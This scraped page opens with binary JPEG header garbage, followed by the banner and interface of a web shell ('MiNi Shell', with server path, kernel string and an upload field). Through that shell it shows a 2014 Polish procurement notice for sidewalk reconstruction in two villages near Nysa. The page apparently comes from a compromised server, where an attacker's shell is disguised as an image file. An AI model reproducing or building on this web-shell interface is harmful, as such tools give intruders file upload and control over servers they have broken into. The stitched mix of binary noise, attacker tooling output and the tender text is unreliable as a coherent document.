JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140902/290800-N-2014.html

<p class="kh_header"><b>Nysa: Przebudowa chodników w ciągu drogi powiatowej Nr 1532 O w miejscowości Szadurczyce, w ciągu drogi powiatowej Nr 1533 O w miejscowości Bielice</b><br>
<b>Numer ogłoszenia: 290800 - 2014; data zamieszczenia: 02.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Nysie , ul. Słowiańska 17, 48-300 Nysa, woj. opolskie, tel. (077) 4482408, faks (077) 4482408.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp.nysa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa chodników w ciągu drogi powiatowej Nr 1532 O w miejscowości Szadurczyce, w ciągu drogi powiatowej Nr 1533 O w miejscowości Bielice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót: 
Chodnik w miejscowości Szadurczyce
- koryta wykonywane mechanicznie gł. 10 cm w gruncie kat. II-VI na całej szerokości jezdni i chodników na powierzchni 321,30 m2,
- koryta wykonywane mechanicznie gł. 20 cm w gruncie kat. II-VI na całej szerokości jezdni i chodników na powierzchni 54,10 m2,
- roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. I-III w ziemi uprzednio zmg. w hałdach z transp. urobku na odl. 1 km sam. samowył. w ilości 42,950 m3,
- rowki pod krawężniki i ławy krawężnikowe o wymiarach 30*30 cm 
w gruncie kat. III- IV na długości 255,20m,
- rowki pod krawężniki i lawy krawężnikowe o wymiarach 20*20 cm 
w gruncie kat. III- IV (dla obrzeży) na długości 214,20 m,
- ława pod krawężniki betonowa z oporem (dla krawężników) w ilości 12,969 m3,
- ława pod krawężniki betonowe z oporem (dla obrzeży) w ilości 6,426 m3,
- krawężniki betonowe wystające o wymiarach 15*30 cm bez ław na podsypce piaskowej (na zjazdach przewidzieć krawężniki najazdowe) na długości 247,20 m,
- krawężniki betonowe wystające o wymiarach 15*30 cm bez ław na podsypce piaskowej (krawężniki na wjazdach kładzione na płask) na długości 33 m,
- krawężniki betonowe wystające o wymiarach 15*30 cm na podsypce piaskowej - łukowe na długości 8,0 m,
- krawężniki betonowe - dodatek za ustawienie na łukach o promieniu do 10 m na długości 8,0 m,
- obrzeża betonowe o wymiarach 30*8cm na podsypce piaskowej, spoiny wypełnione piaskiem na długości 221,40 m,
- warstwa górna podbudowy z kruszyw łamanych gr. 15 cm (mieszanka kruszyw łamanych) na powierzchni 312,65 m2,
- warstwa dolna podbudowy z kruszyw łamanych gr.20 cm (dla zjazdów) mieszanka kruszyw łamanych na powierzchni 48,30 m2,
-chodniki z kostki brukowej betonowej grubości 6cm kostka szara na podsypce piaskowej z wypełnieniem spoin piaskiem na powierzchni 312,65  m2,
- chodniki z kostki brukowej betonowej grubości 8cm na podsypce piaskowej z wypełnieniem spoin piaskiem kostka kolorowa (zjazdy) na powierzchni 48,30 m2,
Odwodnienie
- roboty remontowe - cięcie piłą nawierzchni bitumicznych na gł. do 5cm na długości 11 m,
- roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. III- IV z transp. urobku na odl. do 1km sam. samowył. w ilości 10,80 m3,
- demontaż studzienek ściekowych ulicznych betonowych o śr. 500 mm z osadnikiem bez syfonu 4 kpl.
- podłoża pod kanały i obiekty z materiałów sypkich grub. 15 cm w ilości 0,45 m3,
- kanały z rur PVC łączonych na wcisk o śr. zewn. 315 mm na długości 10 m,
- podłoża pod kanały i obiekty z materiałów sypkich o grubości 20 cm - osypka rurociągu piaskiem 20 cm powyżej górnej krawędzi przewodu w ilości 1,50 m3,
- zasypanie wykopów, fund. podłużnych, punktowych, rowów, wykopów obiektowych, spycharkami z zagęszcz. mechanicznym ubijakami (gr. warstwy w stanie luźnym 25 cm)- kat. gr. III- IV
Uwaga- należy doliczyć materiał zagęszczalny do zasypania (pospółka)  w ilości 7,555 m3,
- studzienki ściekowe uliczne betonowe o śr. 500 mm z osadnikiem bez syfonu w ilości 5 szt.
-kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mm na długości 10 m,
- pokrywy nastudzienne żelbetowe o śr. 1000 mm w ilości 4 szt.
- włazy kanałowe żeliwne okrągłe typu lekkiego w ilości 4 szt.
Włączenie drogi gminnej
- roboty remontowe - cięcie piłą nawierzchni bitumicznych o gł. do 5cm na długości 12 m,
- krawężniki betonowe wystające o wymiarach 15*30 cm bez ław na podsypce piaskowej (krawężniki na wjazdach kładzione na płask) na długości 4m,
- nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4cm (warstwa ścieralna) beton asfaltowy na powierzchni 40 m2,
Przystanek autobusowy
- koryta wykonywane mechanicznie gł. 10 cm w gruncie kat. II-VI na całej szerokości jezdni i chodników na powierzchni 42 m2,
- roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 
0,40 m3 w gr. kat. I-III w ziemi uprzednio zmag. w hałdach z transp. urobku na odl. 1km sam. samowylad. w ilości 4,20 m3,
- rowki pod krawężniki i lawy krawężnikowe o wymiarach 30*30 cm 
w gruncie kat. III-IV na długości 16 m,
- ława pod krawężniki betonowa z oporem (dla krawężników) w ilości 1,665 m3,
- ława pod krawężniki betonowa z oporem (dla obrzeży) w ilości 0,720 m3,
- obrzeża betonowe o wymiarach 30*8cm na podsypce piaskowej, spoiny wypełnione piaskiem na długości 21 m,
 - krawężniki betonowe wystające o wymiarach 15*30 cm bez ław na podsypce piaskowej (na zjazdach przewidzieć krawężniki najazdowe)  na długości 16 m,
- warstwa górna podbudowy z kruszyw łamanych gr. 15 cm (mieszanka kruszyw łamanych) na powierzchni 42 m2,
- chodniki z kostki brukowej betonowej grubości 6cm na podsypce piaskowej z wypełnieniem spoin piaskiem na powierzchni 42 m2,
Nawierzchnia bitumiczna
- remont cząstkowy nawierzchni bitumicznej mieszanką mineralno-asfaltową (beton asfaltowy) remont nawierzchni przy krawężniku - grubość warstwy po zagęszczeniu 4cm w ilości 5,244 t,
- pionowe znaki drogowe- znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow. do 0,3 m2 - analogia zakup i montaż lustra drogowego średnica 600 mm w ilości 1 szt,
 - pionowe znaki drogowe - słupki z rur stalowych w ilości 1 szt,
Chodnik w miejscowości Bielice
- mechaniczna rozbiórka podbudowy betonowej o gr. 16 cm z wywozem rumoszu na odl. do 1km (analogia rozbiórka nawierzchni betonowej) na powierzchni 32,80 m2, 
- mechaniczne ścinanie drzew z karczowaniem pni o średnicy 26-35 cm w ilości 1 szt.
- mechaniczne ścinanie drzew z karczowaniem pni o średnicy 36-45 cm w ilości 1 szt.
- mechaniczne ścinanie drzew z karczowaniem pni o średnicy 46-55 cm w ilości 3 szt. 
- mechaniczne ścinanie drzew z karczowaniem pni o średnicy 56-65 cm w ilości 2 szt.
- rozebranie krawężników betonowych na podsypce cementowo- piaskowej na długości 6,50 m,
- wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym - dodatek za każdy następny rozpoczęty 1 km w ilości 5,248 m3
-koryta wykonywane mechanicznie gł. 10 cm w gruncie kat. II-VI na całej szerokości jezdni i chodników na powierzchni 398,31m2,
- koryta wykonywane mechanicznie gł. 20 cm w gruncie kat. II-VI na całej szerokości jezdni i chodników na powierzchni 265,58m2,
- roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0,40 m3 w gr. kat.I- III w ziemi uprzednio zmag. w hałdach z transp. urobku na odl. 1km sam. samowył. w ilości 92,947 m3,
- rowki pod krawężniki i ławy krawężnikowe o wymiarach 30*30 cm w gruncie kat. III- IV na długości 323,90 m,
- rowki pod krawężniki i lawy krawężnikowe o wymiarach 20*20 cm w gruncie kat. III- IV (dla obrzeży) na długości 593,80 m,  
-ława pod krawężniki betonowa z oporem (dla krawężników) w ilości 16,988 m3,
- ława pod krawężniki betonowa z oporem (dla obrzeży) w ilości 17,814 m3,
-krawężniki betonowe wystające o wymiarach 15*30 cm bez ław na podsypce piaskowej (na zjazdach przewidzieć krawężniki najazdowe) na długości 323,90 m,
- krawężniki betonowe wystające o wymiarach 15*30 cm bez ław na podsypce piaskowej (krawężniki na wjazdach kładzione na płask) na długości 53,60 m,
- obrzeża betonowe o wymiarach 30*8cm na podsypce piaskowej, spoiny wypełnione piaskiem na długości 593,80 m,
- warstwa górna podbudowy z kruszyw łamanych gr. 15 cm (mieszanka kruszyw łamanych) na powierzchni 395,70 m2,
- warstwa dolna podbudowy z kruszyw łamanych gr.20 cm (dla zjazdów) mieszanka kruszyw łamanych na powierzchni 265,58 m2,
-chodniki z kostki brukowej betonowej grubości 6cm kostka szara na podsypce piaskowej z wypełnieniem spoin piaskiem na powierzchni 395,70 m2,
- chodniki z kostki brukowej betonowej grubości 8cm na podsypce piaskowej z wypełnieniem spoin piaskiem kostka kolorowa (zjazdy) na powierzchni 265,58 m2,
- chodniki z kostki brukowej betonowej grubości 8cm na podsypce piaskowej z wypełnieniem spoin piaskiem kostka kolorowa (zjazdy) przełożenie istniejącego zjazdu na powierzchni 9,75 m2,
Odwodnienie
- roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. III- IV z transp. urobku na odl. do 1km sam. samowył. w ilości 62,53 m3,
- podłoża pod kanały i obiekty z materiałów sypkich grub. 15 cm w ilości 5,340 m3,
- kanały z rur PVC łączonych na wcisk o śr. zewn. 630 mm na długości 24 m,
- zasypanie wykopów, fund. podłużnych, punktowych, rowów, wykopów obiektowych, spycharkami z zagęszcz. mechanicznym ubijakami (gr. warstwy w stanie luźnym 25 cm)- kat. gr. III- IV
Uwaga- należy doliczyć materiał zagęszczalny do zasypania (pospółka)  w ilości 79,679 m3,
-studzienki ściekowe uliczne betonowe o śr. 500 mm z osadnikiem bez syfonu w ilości 5 szt.
-kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mm na długości 15 m,
- komory murowane z cegły- gr. muru 1 cegła (analogia bloczki żwirobetonowe) w ilości 1,056 m3,
- komory murowane z cegły- płyta betonowa fundamentowa w ilości 1,800 m3,
- komory murowane z bloczków betonowych 12*24*38 (komora o wymiarach 3*3*1,5) w ilości 6,840 m3,
- pokrywy nastudzienne żelbetowe wymiarach 3,0 *3,0 w ilości 1 szt.
- pokrywy nastudzienne żelbetowe o śr. 1000 mm w ilości 4 szt.
- włazy kanałowe żeliwne okrągłe typu lekkiego w ilości 4 szt.
- remont cząstkowy nawierzchni bitumicznej mieszanką mineralno-asfaltową (beton asfaltowy) - remont nawierzchni przy krawężniku grubość warstwy po zagęszczeniu 4cm w ilości 6,460 t,
- ścieki z elementów betonowych gr. 20 cm na podsypce piaskowej analogia ścieki liniowe prefabrykowane na długości 31,50 m,
- rozebranie barier drogowych stalowych na długości 5,0 m,
- regulacja pionowa studzienek dla zaworów wodociągowych i gazowych w ilości 6szt.
Włączenie drogi transportu rolnego
- koryta wykonywane mechanicznie gł. 30 cm w gruncie kat. II-VI na całej szerokości jezdni i chodników na powierzchni 31,90 m2,
- roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 
0,40 m3 w gr. kat. I-III w ziemi uprzednio zmag. w hałdach z transportem urobku na odl. 1km sam. samowyład. w ilości 9,57 m3
- ława pod krawężniki betonowe z oporem ( dla krawężników) w ilości 0,450 m3, 
- krawężniki betonowe wystające o wymiarach 15*30 cm bez ław na podsypce piaskowej na długości 10 m,
- warstwa dolna podbudowy z kruszyw łamanych gr. 25 cm (mieszanka kruszyw łamanych) nas powierzchni 31,90 m2,
- nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 5cm (warstwa ścieralna) beton asfaltowy na powierzchni 31,90 m2,
oraz inne roboty niezbędne do prawidłowego wykonania zamówienia
Szczegółowy opis przedmiotu zamówienia zawiera:
1.Przedmiar robót,
2.Specyfikacja techniczna wykonania i odbioru robót budowlanych w części budowlanych, obejmujące wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót,
W ramach zamówienia wykonawca zobowiązany jest także do:
1.Zachowania przepisów BHP,
2.Wykonawca wykonana we własnym zakresie projekt organizacji ruchu i uzyska jego zatwierdzenie u właściwego zarządcy drogi oraz na jego podstawie  będzie utrzymywał oznakowanie w trakcie realizacji robót. 
Na podstawie zatwierdzonego projektu zgłosi odpowiednim organom zmianę organizacji ruchu na czas prowadzonych robót,  
3.Wykonawca opracuje szczegółowy harmonogram robót,
4.Wykonawca jako wytwórca odpadów powstających w trakcie budowy odpowiada za ich składowanie oraz w razie konieczności powinien uregulować stan formalno-prawny w zakresie gospodarki odpadami (art.17 ustawy z dnia 27 kwietnia 2001r. o odpadach Dz. U. Nr 62 poz.628 z późn. zmianami.)
5.Wykonawca sporządzi operat kolaudacyjny,
6.Przed przystąpieniem do prac związanych z przebudową w/w chodników Wykonawca winien zapoznać się z położeniem znaków geodezyjnych w obrębie obszaru inwestycyjnego w Powiatowym Ośrodku Geodezyjno-Kartograficznym w Nysie i zabezpieczyć je przed zniszczeniem.
7.Lustro drogowe w miejscowości Szadurczyce zamontować na podstawie zatwierdzonego projektu organizacji ruchu( projekt w załączeniu)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt.6 ustawy Pzp do wysokości 50% wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać. Ocena na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać  doświadczenie w wykonywaniu (zakończeniu)
w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej:
- jednego zadania polegającego na budowie, przebudowie lub remoncie chodnika  o powierzchni nie mniejszej niż 500 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać. Ocena na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia legitymujące się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do stanowisk jakie im zostaną powierzone- zgodnie z poniższym wykazem:
a/ osoba na stanowisko Kierownika budowy:
Opis sposobu dokonywania oceny warunku:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- doświadczenie zawodowe:
  - co najmniej 3 lata od uzyskania uprawnień  i
  - praca na stanowisku kierownika budowy lub kierownika robót na co najmniej 
    jednym  zadaniu polegającym na budowie, przebudowie lub remoncie chodnika</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 150 tyś. PLN
UWAGA: Wartości podane w dokumentach w walutach innych niż wskazane powyżej wykonawca przeliczy: 
- dla ubezpieczenia- wg średniego kursu NBP na 7 dni przed terminem składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
